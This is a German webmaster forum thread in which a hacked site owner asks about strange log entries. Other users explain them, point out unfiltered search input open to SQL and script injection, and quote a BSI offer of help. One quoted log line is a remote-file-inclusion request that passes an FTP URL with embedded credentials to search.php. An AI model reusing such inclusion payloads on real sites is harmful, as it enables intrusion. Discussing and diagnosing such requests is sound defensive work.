Hackerangiff auf Webprojekt seit letzter Woche dauerhaft ...

Beitrag von **Synonym** » 21.04.2010, 11:42

@e-fee
Genau wegen dem Abakus-Artikel / Snippet habe ich gefragt

Wenn dem nicht so wäre, dann hätte der wohl auch bei den Regierungen kopiert:
https://www.chauffeurcenter.com/de-DE/go-0/Regierung/

von **Anzeige von ABAKUS** »

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002

persönliche Betreuung
individuelle Beratung
kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.

Beitrag von **euroexchange.de** » 21.04.2010, 12:29

Danke für Eure Hinweise.

Ich finde das hier halt nicht so lustig und suche nach Ursachen ...

https://www.ranking-hits.de/user/www.euroexchange.de

Im Moment fressen sich Google und MSN gleichzeitig durch meine Seite und das mit ca. 1.000 Aufrufen in 30 Min.

Habe - bzgl. Chauf... - zum ersten Mal etwas an Google gemeldet und um Prüfung gebeten ...

Beitrag von **profo** » 21.04.2010, 12:49

euroexchange.de hat geschrieben:Im Moment fressen sich Google und MSN gleichzeitig durch meine Seite und das mit ca. 1.000 Aufrufen in 30 Min.

Geht doch eigentlich noch... Falls Deine Site bei dem Tempo aber aus der Puste kommt kannst Du für die Krabbeltiere von Yahoo und MS im robots.txt ein Crawl-Delay einführen. Bei Google musst Du das in den WMT direkt einstellen.

Für eine Zusatzpause von 1 Sekunde für Y und M ins robots.txt:

User-agent: *
Crawl-delay: 1.0

Beitrag von **euroexchange.de** » 21.04.2010, 14:24

Folgendes taucht heute in den Logfiles auf. Kann jemand was damit anfangen?

anon-92-230-59-60.alicedsl.de - - [21/Apr/2010:01:23:12 +0200] "GET /javascript/'+this.o_root.a_tpl[this.n_state&8?'icon_l':'icon_e']+' HTTP/1.1" 302 211 "-" "Java/1.6.0_17"
anon-92-230-59-60.alicedsl.de - - [21/Apr/2010:01:23:12 +0200] "GET / HTTP/1.1" 200 49381 "-" "Java/1.6.0_17"
anon-92-230-59-60.alicedsl.de - - [21/Apr/2010:01:23:16 +0200] "GET /javascript/'+this.o_root.a_tpl[tmpk.n_state&33?'icon_e':'icon_l']+' HTTP/1.1" 302 211 "-" "Java/1.6.0_17"

anon-92-230-59-60.alicedsl.de - - [21/Apr/2010:01:23:39 +0200] "GET //catimages/motorrad.png HTTP/1.1" 200 3001 "-" "Java/1.6.0_17"
anon-92-230-59-60.alicedsl.de - - [21/Apr/2010:01:23:39 +0200] "GET //catimages/new_abc.png HTTP/1.1" 200 1291 "-" "Java/1.6.0_17"
anon-92-230-59-60.alicedsl.de - - [21/Apr/2010:01:23:39 +0200] "GET //catimages/new_sonstiges.png HTTP/1.1" 200 1363 "-" "Java/1.6.0_17"
anon-92-230-59-60.alicedsl.de - - [21/Apr/2010:01:23:39 +0200] "GET /javascript/'+tmp4[0]+' HTTP/1.1" 302 211 "-" "Java/1.6.0_17"
anon-92-230-59-60.alicedsl.de - - [21/Apr/2010:01:23:39 +0200] "GET / HTTP/1.1" 200 49377 "-" "Java/1.6.0_17"

anon-92-230-59-60.alicedsl.de - - [21/Apr/2010:01:23:42 +0200] "GET /javascript/'+tmp4[1]+' HTTP/1.1" 302 211 "-" "Java/1.6.0_17"
anon-92-230-59-60.alicedsl.de - - [21/Apr/2010:01:23:43 +0200] "GET / HTTP/1.1" 200 49377 "-" "Java/1.6.0_17"

anon-75-127-118-109.rdparker.com - - [21/Apr/2010:14:11:19 +0200] "GET /search.php?do_search=ftp://securypos:mbaw21@securypos.50webs ... stMail.php? HTTP/1.1" 200 22271 "-" "Mozilla/3.0 (compatible; Indy Library)"

Beitrag von **Mork vom Ork** » 21.04.2010, 16:29

euroexchange.de hat geschrieben:"GET /javascript/'+this.o_root.a_tpl[this.n_state&8?'icon_l':'icon_e']+' HTTP/1.1" 302 211 "-" "Java/1.6.0_17"

Da hat jemand versucht, einen Crawler mit Java zu schreiben und ist an HTML gescheitert.

"GET /search.php?do_search=ftp://securypos:mbaw21@securypos.50webs ... stMail.php? HTTP/1.1" 200 22271 "-" "Mozilla/3.0 (compatible; Indy Library)"

Interessant, das sind Zugangsdaten für einen FTP-Server, vielleicht ein Versuch, deinen Server als Proxy zu missbrauchen. Falls du kein Skript /search.php hast, muss dich das persönlich nicht kümmern – nichtsdestotrotz solltest du abuse@50webs.com unterrichten, dass da jemand besagte Zugangsdaten in die weite Welt hinauspustet.

Beitrag von **euroexchange.de** » 22.04.2010, 13:53

@Mork

Danke. Habe denen - wie von dir empfohlen - eine Email geschickt.

Sobald man in den Alexa Top 100.000 steht - und sonst noch wo mit guten Besucherzahlen auftaucht - hat man die eigenartigsten Vorgänge in den Logfiles.

Beitrag von **Synonym** » 22.04.2010, 14:04

Hm, das ist in der Tat nicht sonderlich selten, aber warum Dein Server dann bei dem Javascript-Mist mit Status-Code 302 und bei dem FTP-Zeugs mit 200 antwortet, wirst wohl nur Du wissen. Meiner lehnt so etwas jedenfalls ab.

Beitrag von **euroexchange.de** » 22.04.2010, 14:17

@Synonym

Einige Projekte liegen noch bei Strato und da habe ich keinen Sugriff auf die Server. Kannst Du mir etwas zum Hintergrund der Codes sagen - also was meinst Du damit. Ich weiß leider (noch) nicht was diese Codes im Hinblick auf evtl. Sicherheitslücken aussagen.

302 (Redirect ?)

Kann es sein, das jemand die Seitenaufrufe bzw. die Aufrufe für Google oder den Googlecache auf andere Seiten umleitet ohne das ich das im Browser sehe?

Danke

Beitrag von **Synonym** » 22.04.2010, 14:32

Die sagen zu Sicherheitslücken nichts aus, nur dazu was der Server antwortet im Bezug auf die Anfrage.

Der Spammer fragt an:
/javascript/'+this.o_root.a_tpl[this.n_state&8?'icon_l':'icon_e']+' HTTP/1.1" 302 211 "-" "Java/1.6.0_17"

Dein Server sagt: Ja, liegt aber derzeit wo anders (302). Warum? Du leitest so einen Mist also auch noch absichtlich weiter.

Fragt an:
/search.php?do_search=ftp://securypos:mbaw21@securypos.50webs ... stMail.php? HTTP/1.1"
Server sagt: Ja hab ich (200). Dabei gibt es die gar nicht. Die search.php zwar schon, aber die Parameter stimmen nicht. "do_search=ftp:..." sollte das nicht "do_search=1" sein? Also, so was erst dar nicht annehmen.

Dann geht es bei Dir noch viel weiter, nicht nur die schon angesprochenen include(). Deine Suchfunktion filtert rein gar nichts, der kann man HTML, JavaScript und sogar SQL-Anweisungen übergeben. Dein Datenbankserver antwortet dann auch noch brav und gibt weitere Daten bekannt.

Deine Formular-Eingaben werden auch ungeprüft und unmaskiert an dieses komische Amazon-Widget übergeben. Ich denke nicht dass die sich so sonderlich darüber freuen. Theoretisch könnte man da auch den JavaScript-Block von außen modifizieren, denn die Eingaben werden ja einfach so übernommen.

Also bei Dir ist da ziemlich viel im argen. Solch komische Logfile-Einträge sind eigentlich egal, wenn der Rest dahinter sicher ist und auf solche Anfragen auch entsprechend reagiert.

Beitrag von **euroexchange.de** » 22.04.2010, 14:48

Danke für die ausführliche Antwort.

Um ungültige Variablen die z.B. an die "search.php" angehängt werden zu verhindern, müßte ich diese Variablen im "search.php" - Skript selbst prüfen und auf diese Weise auch in jedem einzelnen Skript?

Wenn ich das Schreiben durch Skripte auf dem gesamten Webspace unterbunden habe, ist das System dann nicht zunächst sicher oder kann hier immer noch jemand Schadcode einbringen?

Ich muß mich in dieses Thema so schnell wie möglich einlesen, sonst sind wohl auch die Fragen die ich hier stelle recht unqualifiziert.

Beitrag von **Synonym** » 22.04.2010, 15:13

Um ungültige Variablen die z.B. an die "search.php" angehängt werden zu verhindern, müßte ich diese Variablen im "search.php" - Skript selbst prüfen und auf diese Weise auch in jedem einzelnen Skript?

Ja. Zumindest prüfen ob es die Konstellation überhaupt gibt.
Falsche Anfrage -> Fehler senden.
Richtige Anfrage, aber keine Treffer -> Normale Seite mit dem Hinweis, dass nichts gefunden wurde.

Derzeit jagst Du alles durch Dein Script, egal ob die Art der Anfrage stimmt oder nicht.

Wenn ich das Schreiben durch Skripte auf dem gesamten Webspace unterbunden habe, ist das System dann nicht zunächst sicher oder kann hier immer noch jemand Schadcode einbringen?

Sicher ist nichts wenn wo anders noch Lücken sind. Du magst zwar die Schreibrechte entzogen haben, aber das bringt nichts, wenn Du die URL-Eingaben ungeprüft verwendest. Auch bringen die entzogenen Schreibrechte nichts, wenn man über Dein Suchformular die Datenbank direkt ansprechen kann.

Beitrag von **euroexchange.de** » 27.04.2010, 12:24

Heute bekomme ich folgende Email:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Sehr geehrte Damen und Herren,

Sie wurden in den letzten Tagen durch CERT-Bund darÃ¼ber infomiert, dass Ihre Webseite "gehackt" wurde, d.h. von einem Angreifer aus dem Internet kompromittiert wurde.

Im Rahmen der Abwehr von Internetangriffen zum Schutz der Bundesverwaltung fÃ¼hrt das BSI technische Analysen derartiger VorfÃ¤lle durch.

Aus diesem Grund wÃ¤ren wir Ihnen fÃ¼r eine unterstÃ¼tzende Zusammenarbeit sehr dankbar.

Unter UmstÃ¤nden ergeben sich auch fÃ¼r Sie weitere oder neue Erkenntnisse:
Wie ist der Angreifer in das System eingedrungen?
Welche Schwachstelle wurde ausgenutzt?
Wie kÃ¶nnen Ã¤hnliche Angriffe in Zukunft vermieden werden?
Gibt es weitere Schwachstellen in Ihrem Webangebot?

Das BSI mÃ¶chte Ihnen daher anbieten, Sie bei der Analyse der Log-Dateien des Webservers sowie der Untersuchung verdÃ¤chtiger PHP-Skripte zu unterstÃ¼tzen, u.a. durch die Bereitstellung von Analyseprogrammen.

Hinweis:
Ein Zugriff durch das BSI auf Ihr System ist weder erforderlich noch
vorgesehen.

Wenn Sie an einer Zusammenarbeit interessiert sind oder Fragen haben, wenden Sie sich bitte telefonisch oder per E-Mail direkt an:

..

Was haltet Ihr davon?

Beitrag von **pimpi** » 27.04.2010, 13:39

Na wer hat ihm diese Email geschickt?

Beitrag von **euroexchange.de** » 27.04.2010, 15:26

Email ist echt. Habe dort angerufen.

Sehr interessant ...

Beitrag von **Alda** » 27.04.2010, 15:41

Wirklich interessant, gib Gas.